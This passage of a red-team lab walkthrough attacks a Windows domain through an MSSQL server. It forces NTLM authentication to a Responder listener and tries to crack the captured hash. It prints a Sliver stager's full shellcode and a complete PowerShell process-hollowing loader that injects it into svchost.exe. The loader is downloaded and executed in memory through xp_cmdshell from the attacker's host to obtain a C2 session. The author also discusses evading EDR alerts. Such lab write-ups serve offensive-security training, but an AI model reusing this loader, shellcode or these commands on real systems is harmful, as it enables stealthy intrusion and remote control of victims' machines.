[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.0.230]
    Responder IPv6             [fe80::e2c7:8a12:57c3:2628]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-W2DDZFTSLU0]
    Responder Domain Name      [GLW8.LOCAL]
    Responder DCE-RPC Port     [48647]

[+] Listening for events...

[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting TCP server on port 53, check permissions or other servers running.

Launch MSSQL command to list a “non existed” share to force authentication:

SQL >[SQL07.IT-IFRIT.VL]; (adm  dbo@master)> exec master.dbo.xp_dirtree '\\10.8.0.230\notexist\path'

Grab the NTLM hash with Responder:

[SMB] NTLMv2-SSP Client   : 172.16.41.251
[SMB] NTLMv2-SSP Username : IT-IFRIT\SQL07$
[SMB] NTLMv2-SSP Hash     : SQL07$::IT-IFRIT:e893f3115d3605f3:0E9E2635BA753F8C647917250006E46B:010100000000000000FDFFBE41FDDA010DC378BA16652A02000000000200080047004C005700380001001E00570049004E002D0057003200440044005A004600540053004C005500300004003400570049004E002D0057003200440044005A004600540053004C00550030002E0047004C00570038002E004C004F00430041004C000300140047004C00570038002E004C004F00430041004C000500140047004C00570038002E004C004F00430041004C000700080000FDFFBE41FDDA010600040002000000080030003000000000000000000000000030000097D56AB1BDE605C1DBF59FFAF70C46CE967121A4493EEF826618E792DBCB096C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0030002E003200330030000000000000000000

Try to crack it (but as a computer hash, seems so much difficult):

$ cat sql07.hash 
SQL07$::IT-IFRIT:e893f3115d3605f3:0E9E2635BA753F8C647917250006E46B:010100000000000000FDFFBE41FDDA010DC378BA16652A02000000000200080047004C005700380001001E00570049004E002D0057003200440044005A004600540053004C005500300004003400570049004E002D0057003200440044005A004600540053004C00550030002E0047004C00570038002E004C004F00430041004C000300140047004C00570038002E004C004F00430041004C000500140047004C00570038002E004C004F00430041004C000700080000FDFFBE41FDDA010600040002000000080030003000000000000000000000000030000097D56AB1BDE605C1DBF59FFAF70C46CE967121A4493EEF826618E792DBCB096C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0030002E003200330030000000000000000000
$ hashcat -a 0 -m 5600 sql07.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: cpu--0x000, 1437/2939 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL07$::IT-IFRIT:e893f3115d3605f3:0e9e2635ba753f8c6...000000
Time.Started.....: Mon Sep  2 14:15:26 2024 (12 secs)
Time.Estimated...: Mon Sep  2 14:15:38 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1260.5 kH/s (0.34ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 92%

Started: Mon Sep  2 14:15:25 2024
Stopped: Mon Sep  2 14:15:39 2024

Failed

So, we create a new Sliver stager:

generate stager -a amd64 -o windows -r http -L 10.8.0.230 -l 80 --format ps1 --save ./

We choose the powershell format because we want to use in in our special same PoSH that we used at the begnning and did not trigger any alert so we are pretty confident.

$ cat PALE_RANCH 
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x44,0x8b,0x40,0x20,0x50,0x49,0x1,0xd0,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x68,0x74,0x74,0x70,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x4,0x1f,0x9d,0xbb,0x0,0x0,0x0,0x0,0xff,0xd5,0x49,0x89,0xc4,0xe8,0x16,0x0,0x0,0x0,0x31,0x0,0x30,0x0,0x2e,0x0,0x38,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x32,0x0,0x33,0x0,0x30,0x0,0x0,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x50,0x0,0x0,0x0,0x4d,0x31,0xc9,0x49,0xba,0x46,0x9b,0x1e,0xc2,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xcc,0x0,0x0,0x0,0x68,0x0,0x74,0x0,0x74,0x0,0x70,0x0,0x3a,0x0,0x2f,0x0,0x2f,0x0,0x31,0x0,0x30,0x0,0x2e,0x0,0x38,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x32,0x0,0x33,0x0,0x30,0x0,0x2f,0x0,0x49,0x0,0x6e,0x0,0x74,0x0,0x65,0x0,0x72,0x0,0x2d,0x0,0x4d,0x0,0x65,0x0,0x64,0x0,0x69,0x0,0x75,0x0,0x6d,0x0,0x2e,0x0,0x77,0x0,0x6f,0x0,0x66,0x0,0x66,0x0,0x2f,0x0,0x70,0x0,0x74,0x0,0x46,0x0,0x6f,0x0,0x38,0x0,0x46,0x0,0x66,0x0,0x53,0x0,0x37,0x0,0x42,0x0,0x4a,0x0,0x52,0x0,0x69,0x0,0x31,0x0,0x43,0x0,0x4a,0x0,0x4e,0x0,0x31,0x0,0x4a,0x0,0x65,0x0,0x46,0x0,0x51,0x0,0x6d,0x0,0x58,0x0,0x6f,0x0,0x53,0x0,0x65,0x0,0x48,0x0,0x53,0x0,0x41,0x0,0x6d,0x0,0x34,0x0,0x4b,0x0,0x4d,0x0,0x4b,0x0,0x66,0x0,0x6c,0x0,0x46,0x0,0x41,0x0,0x78,0x0,0x7a,0x0,0x54,0x0,0x7a,0x0,0x39,0x0,0x48,0x0,0x4e,0x0,0x38,0x0,0x6c,0x0,0x30,0x0,0x58,0x0,0x63,0x0,0x4d,0x0,0x32,0x0,0x36,0x0,0x62,0x0,0x6a,0x0,0x46,0x0,0x49,0x0,0x76,0x0,0x72,0x0,0x56,0x0,0x48,0x0,0x77,0x0,0x6a,0x0,0x51,0x0,0x0,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x89,0xc5,0x49,0x83,0xc0,0x22,0x4d,0x31,0xc9,0x53,0x48,0xc7,0xc0,0x0,0x1,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0x98,0x10,0xb3,0x5b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xe8,0x20,0x48,0x89,0xe7,0x48,0x89,0xf9,0x49,0xc7,0xc2,0x21,0xa7,0xb,0x60,0xff,0xd5,0x85,0xc0,0xf,0x84,0x6d,0x0,0x0,0x0,0x48,0x8b,0x47,0x8,0x85,0xc0,0x74,0x3a,0x48,0x89,0xd9,0x48,0xff,0xc1,0x48,0xc1,0xe1,0x20,0x51,0x53,0x50,0x48,0xb8,0x3,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x50,0x49,0x89,0xe0,0x48,0x83,0xec,0x20,0x48,0x89,0xe7,0x49,0x89,0xf9,0x4c,0x89,0xe1,0x4c,0x89,0xea,0x49,0xc7,0xc2,0xda,0xdd,0xea,0x49,0xff,0xd5,0x85,0xc0,0x74,0x2d,0xeb,0x12,0x48,0x8b,0x47,0x10,0x85,0xc0,0x74,0x23,0x48,0x83,0xc7,0x8,0x6a,0x3,0x58,0x48,0x89,0x7,0x49,0x89,0xf8,0x6a,0x18,0x41,0x59,0x48,0x89,0xf1,0x6a,0x26,0x5a,0x49,0xba,0xd3,0x58,0x9d,0xce,0x0,0x0,0x0,0x0,0xff,0xd5,0x6a,0xa,0x5f,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x53,0x53,0x53,0x53,0x49,0xba,0x95,0x58,0xbb,0x91,0x0,0x0,0x0,0x0,0xff,0xd5,0x85,0xc0,0x75,0xc,0x48,0xff,0xcf,0x74,0x2,0xeb,0xdd,0xe8,0x79,0x0,0x0,0x0,0x48,0x89,0xf1,0x53,0x5a,0x49,0xc7,0xc2,0x5,0x88,0x9d,0x70,0xff,0xd5,0x85,0xc0,0x74,0xe9,0x53,0x48,0x89,0xe2,0x53,0x49,0x89,0xe1,0x6a,0x4,0x41,0x58,0x48,0x89,0xf1,0x49,0xc7,0xc2,0x6c,0x29,0x24,0x7e,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x48,0x83,0xc4,0x28,0x53,0x59,0x5a,0x48,0x89,0xd3,0x6a,0x40,0x41,0x59,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x49,0x89,0xc0,0x48,0x89,0xda,0x49,0x89,0xf9,0x49,0xc7,0xc2,0x6c,0x29,0x24,0x7e,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0xf,0x84,0x84,0xff,0xff,0xff,0x58,0xc3,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5

Our PoSH stage5.ps1 (compact version):

[Byte[]] $SHELLCODE = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x44,0x8b,0x40,0x20,0x50,0x49,0x1,0xd0,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x68,0x74,0x74,0x70,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x4,0x1f,0x9d,0xbb,0x0,0x0,0x0,0x0,0xff,0xd5,0x49,0x89,0xc4,0xe8,0x16,0x0,0x0,0x0,0x31,0x0,0x30,0x0,0x2e,0x0,0x38,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x32,0x0,0x33,0x0,0x30,0x0,0x0,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x50,0x0,0x0,0x0,0x4d,0x31,0xc9,0x49,0xba,0x46,0x9b,0x1e,0xc2,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xcc,0x0,0x0,0x0,0x68,0x0,0x74,0x0,0x74,0x0,0x70,0x0,0x3a,0x0,0x2f,0x0,0x2f,0x0,0x31,0x0,0x30,0x0,0x2e,0x0,0x38,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x32,0x0,0x33,0x0,0x30,0x0,0x2f,0x0,0x49,0x0,0x6e,0x0,0x74,0x0,0x65,0x0,0x72,0x0,0x2d,0x0,0x4d,0x0,0x65,0x0,0x64,0x0,0x69,0x0,0x75,0x0,0x6d,0x0,0x2e,0x0,0x77,0x0,0x6f,0x0,0x66,0x0,0x66,0x0,0x2f,0x0,0x70,0x0,0x74,0x0,0x46,0x0,0x6f,0x0,0x38,0x0,0x46,0x0,0x66,0x0,0x53,0x0,0x37,0x0,0x42,0x0,0x4a,0x0,0x52,0x0,0x69,0x0,0x31,0x0,0x43,0x0,0x4a,0x0,0x4e,0x0,0x31,0x0,0x4a,0x0,0x65,0x0,0x46,0x0,0x51,0x0,0x6d,0x0,0x58,0x0,0x6f,0x0,0x53,0x0,0x65,0x0,0x48,0x0,0x53,0x0,0x41,0x0,0x6d,0x0,0x34,0x0,0x4b,0x0,0x4d,0x0,0x4b,0x0,0x66,0x0,0x6c,0x0,0x46,0x0,0x41,0x0,0x78,0x0,0x7a,0x0,0x54,0x0,0x7a,0x0,0x39,0x0,0x48,0x0,0x4e,0x0,0x38,0x0,0x6c,0x0,0x30,0x0,0x58,0x0,0x63,0x0,0x4d,0x0,0x32,0x0,0x36,0x0,0x62,0x0,0x6a,0x0,0x46,0x0,0x49,0x0,0x76,0x0,0x72,0x0,0x56,0x0,0x48,0x0,0x77,0x0,0x6a,0x0,0x51,0x0,0x0,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x89,0xc5,0x49,0x83,0xc0,0x22,0x4d,0x31,0xc9,0x53,0x48,0xc7,0xc0,0x0,0x1,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0x98,0x10,0xb3,0x5b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xe8,0x20,0x48,0x89,0xe7,0x48,0x89,0xf9,0x49,0xc7,0xc2,0x21,0xa7,0xb,0x60,0xff,0xd5,0x85,0xc0,0xf,0x84,0x6d,0x0,0x0,0x0,0x48,0x8b,0x47,0x8,0x85,0xc0,0x74,0x3a,0x48,0x89,0xd9,0x48,0xff,0xc1,0x48,0xc1,0xe1,0x20,0x51,0x53,0x50,0x48,0xb8,0x3,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x50,0x49,0x89,0xe0,0x48,0x83,0xec,0x20,0x48,0x89,0xe7,0x49,0x89,0xf9,0x4c,0x89,0xe1,0x4c,0x89,0xea,0x49,0xc7,0xc2,0xda,0xdd,0xea,0x49,0xff,0xd5,0x85,0xc0,0x74,0x2d,0xeb,0x12,0x48,0x8b,0x47,0x10,0x85,0xc0,0x74,0x23,0x48,0x83,0xc7,0x8,0x6a,0x3,0x58,0x48,0x89,0x7,0x49,0x89,0xf8,0x6a,0x18,0x41,0x59,0x48,0x89,0xf1,0x6a,0x26,0x5a,0x49,0xba,0xd3,0x58,0x9d,0xce,0x0,0x0,0x0,0x0,0xff,0xd5,0x6a,0xa,0x5f,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x53,0x53,0x53,0x53,0x49,0xba,0x95,0x58,0xbb,0x91,0x0,0x0,0x0,0x0,0xff,0xd5,0x85,0xc0,0x75,0xc,0x48,0xff,0xcf,0x74,0x2,0xeb,0xdd,0xe8,0x79,0x0,0x0,0x0,0x48,0x89,0xf1,0x53,0x5a,0x49,0xc7,0xc2,0x5,0x88,0x9d,0x70,0xff,0xd5,0x85,0xc0,0x74,0xe9,0x53,0x48,0x89,0xe2,0x53,0x49,0x89,0xe1,0x6a,0x4,0x41,0x58,0x48,0x89,0xf1,0x49,0xc7,0xc2,0x6c,0x29,0x24,0x7e,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x48,0x83,0xc4,0x28,0x53,0x59,0x5a,0x48,0x89,0xd3,0x6a,0x40,0x41,0x59,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x49,0x89,0xc0,0x48,0x89,0xda,0x49,0x89,0xf9,0x49,0xc7,0xc2,0x6c,0x29,0x24,0x7e,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0xf,0x84,0x84,0xff,0xff,0xff,0x58,0xc3,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
filter Get-Type ([string]$dllName,[string]$typeName)
{
    if( $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($dllName) )
    {
        $_.GetType($typeName)
    }
}
function Get-Function
{
    Param(
        [string] $module,
        [string] $function
    )
    if( ($null -eq $GetModuleHandle) -or ($null -eq $GetProcAddress) )
    {
        throw "Error: GetModuleHandle and GetProcAddress must be initialized first!"
    }
    $moduleHandle = $GetModuleHandle.Invoke($null, @($module))
    $GetProcAddress.Invoke($null, @($moduleHandle, $function))
}
function Get-Delegate
{
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr,
        [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes,
        [Parameter(Position = 2)] [Type] $retType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('QM', $false).
    DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed')
    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed')
    $delegate = $type.CreateType()

    [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate)
}
$assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$unsafeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.UnsafeNativeMethods'
$nativeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods'
$startupInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods+STARTUPINFO'
$processInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.SafeNativeMethods+PROCESS_INFORMATION'
$GetModuleHandle = $unsafeMethodsType.GetMethod('GetModuleHandle')
$GetProcAddress = $unsafeMethodsType.GetMethod('GetProcAddress', [reflection.bindingflags]'Public,Static', $null, [System.Reflection.CallingConventions]::Any, @([System.IntPtr], [string]), $null);
$CreateProcess = $nativeMethodsType.GetMethod("CreateProcess")
$ResumeThreadAddr = Get-Function "kernel32.dll" "ResumeThread"
$ReadProcessMemoryAddr = Get-Function "kernel32.dll" "ReadProcessMemory"
$WriteProcessMemoryAddr = Get-Function "kernel32.dll" "WriteProcessMemory"
$ZwQueryInformationProcessAddr = Get-Function "ntdll.dll" "ZwQueryInformationProcess"
$ResumeThread = Get-Delegate $ResumeThreadAddr @([IntPtr])
$WriteProcessMemory = Get-Delegate $WriteProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int32], [IntPtr])
$ReadProcessMemory = Get-Delegate $ReadProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int], [IntPtr]) ([Bool])
$ZwQueryInformationProcess = Get-Delegate $ZwQueryInformationProcessAddr @([IntPtr], [Int], [Byte[]], [UInt32], [UInt32]) ([Int])
$startupInformation = $startupInformationType.GetConstructors().Invoke($null)
$processInformation = $processInformationType.GetConstructors().Invoke($null)
$cmd = [System.Text.StringBuilder]::new("C:\\Windows\\System32\\svchost.exe")
$CreateProcess.Invoke($null, @($null, $cmd, $null, $null, $false, 0x4, [IntPtr]::Zero, $null, $startupInformation, $processInformation))
$hThread = $processInformation.hThread
$hProcess = $processInformation.hProcess
$processBasicInformation = [System.Byte[]]::CreateInstance([System.Byte], 48)
$ZwQueryInformationProcess.Invoke($hProcess, 0, $processBasicInformation, $processBasicInformation.Length, 0)
$imageBaseAddrPEB = ([IntPtr]::new([BitConverter]::ToUInt64($processBasicInformation, 0x08) + 0x10))
$memoryBuffer = [System.Byte[]]::CreateInstance([System.Byte], 0x200)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPEB, $memoryBuffer, 0x08, 0)
$imageBaseAddr = [BitConverter]::ToInt64($memoryBuffer, 0)
$imageBaseAddrPointer = [IntPtr]::new($imageBaseAddr)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPointer, $memoryBuffer, $memoryBuffer.Length, 0)
$peOffset = [BitConverter]::ToUInt32($memoryBuffer, 0x3c) 
$entryPointAddrRelative = [BitConverter]::ToUInt32($memoryBuffer, $peOffset + 0x28) 
$entryPointAddr = [IntPtr]::new($imageBaseAddr + $entryPointAddrRelative) 
$WriteProcessMemory.Invoke($hProcess, $entryPointAddr, $SHELLCODE, $SHELLCODE.Length, [IntPtr]::Zero)
$ResumeThread.Invoke($hThread)
exit

Then we download it and execute in memory (before, we need to kill our jobs - https in sliver then set our local web listener and soon its downloaded then rollback to sliver with https listener):

SQL >[SQL07.IT-IFRIT.VL]; (adm  dbo@master)> xp_cmdshell powershell iex(iwr -usebasicparsing 10.8.0.230:443/stage5.ps1)
output   
------   
True     

0        

True     

True     

NULL 
[*] Session a8dc8ab3 MEAN_PRIZE - 172.16.41.251:50295 (SQL07) - windows/amd64 - Thu, 05 Sep 2024 15:05:29 JST

[server] sliver (MEAN_PRIZE) > use a8dc8ab3-58a9-4850-8bf9-3c10918aac2f

[*] Active session MEAN_PRIZE (a8dc8ab3-58a9-4850-8bf9-3c10918aac2f)

[server] sliver (MEAN_PRIZE) > https

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #3

[server] sliver (MEAN_PRIZE) > sessions 

 ID         Transport   Remote Address        Hostname   Username                 Operating System   Health  
========== =========== ===================== ========== ======================== ================== =========
 515b724e   http(s)     172.16.41.40:55640    DEV05      EU-IFRIT\jack.smith      windows/amd64      [ALIVE] 
 a8dc8ab3   http(s)     172.16.41.251:50295   SQL07      NT Service\MSSQLSERVER   windows/amd64      [ALIVE] 

Check the privileges:

[server] sliver (MEAN_PRIZE) > getprivs 

Privilege Information for svchost.exe (PID: 6212)
-------------------------------------------------

Process Integrity Level: High

Name                          	Description                               	Attributes
====                          	===========                               	==========
SeAssignPrimaryTokenPrivilege 	Replace a process level token             	Disabled
SeIncreaseQuotaPrivilege      	Adjust memory quotas for a process        	Disabled
SeChangeNotifyPrivilege       	Bypass traverse checking                  	Enabled, Enabled by Default
SeManageVolumePrivilege       	Perform volume maintenance tasks          	Enabled
SeImpersonatePrivilege        	Impersonate a client after authentication 	Enabled, Enabled by Default
SeCreateGlobalPrivilege       	Create global objects                     	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege 	Increase a process working set            	Disabled
  • We have a session with High process integrity level
  • SeImpersonatePrivilege is enabled then we can abuse it to privilege escalation.

A little bemol is we trigger a low alert:

{BD30F733-FFEE-4203-BAA5-E1C2462B3CAA}

Need to try again after completed this RT Lab to improve your stealth mode (ok low is not so bad but better to trigger nothing, practice makes perfect !!)

Check network config:

[server] sliver (MEAN_PRIZE) > sa-ipconfig 

[*] Successfully executed sa-ipconfig (coff-loader)
[*] Got output:
{DEC03AC1-E658-4711-97FA-042DE79C8525}
	Ethernet
	Amazon Elastic Network Adapter
	06-D0-A8-6F-4A-B3
	172.16.41.251
Hostname: 	SQL07
DNS Suffix: 	it-ifrit.vl
DNS Server: 	172.16.41.17
		8.8.8.8
[server] sliver (MEAN_PRIZE) > sa-arp 

[*] Successfully executed sa-arp (coff-loader)
[*] Got output:

Inteface  --- 0x1
Internet Address        Physical Address        Type                    
224.0.0.22                                      static                  
239.255.255.250                                 static                  

Inteface  --- 0x7
Internet Address        Physical Address        Type                    
169.254.169.250         06-85-AC-85-B6-51       dynamic                 
169.254.169.254         06-85-AC-85-B6-51       dynamic                 
172.16.41.1             06-85-AC-85-B6-51       dynamic                 
172.16.41.17            06-58-8E-06-89-BD       dynamic                 
172.16.41.250           06-95-13-D3-7D-4B       dynamic                 
172.16.41.255           FF-FF-FF-FF-FF-FF       static                  
224.0.0.22              01-00-5E-00-00-16       static                  
224.0.0.251             01-00-5E-00-00-FB       static                  
224.0.0.252             01-00-5E-00-00-FC       static                  
239.255.255.250         01-00-5E-7F-FF-FA       static                  
255.255.255.255         FF-FF-FF-FF-FF-FF       static

Found a new IP 172.16.41.17

We know that we discovered a new domain it-ifrit.vl and we have a list of hostname found during our BloodHound analysis without yet finding their respective IP address.

Check if this IP can be a DNS server that capable to resolve the only device that we know under it-ifrit.vl domain:

[server] sliver (MEAN_PRIZE) > sa-nslookup sql07 172.16.41.17 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A sql07.it-ifrit.vl 172.16.41.251

Ok so in mainly case, the DC has this capacity to be also DNS resolver.

Let’s check if correct:

[server] sliver (MEAN_PRIZE) > sa-nslookup dc07 172.16.41.17 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A dc07.it-ifrit.vl 172.16.41.17
  • Found the IP address of DC07, the Domain controller of it-ifrit.vl.
  • Add dc07.it-ifrit.vl in /etc/hosts
  • Add sudo ip route add 172.16.41.250/32 dev ligolo to access it via our Ligolo-ng tunnel

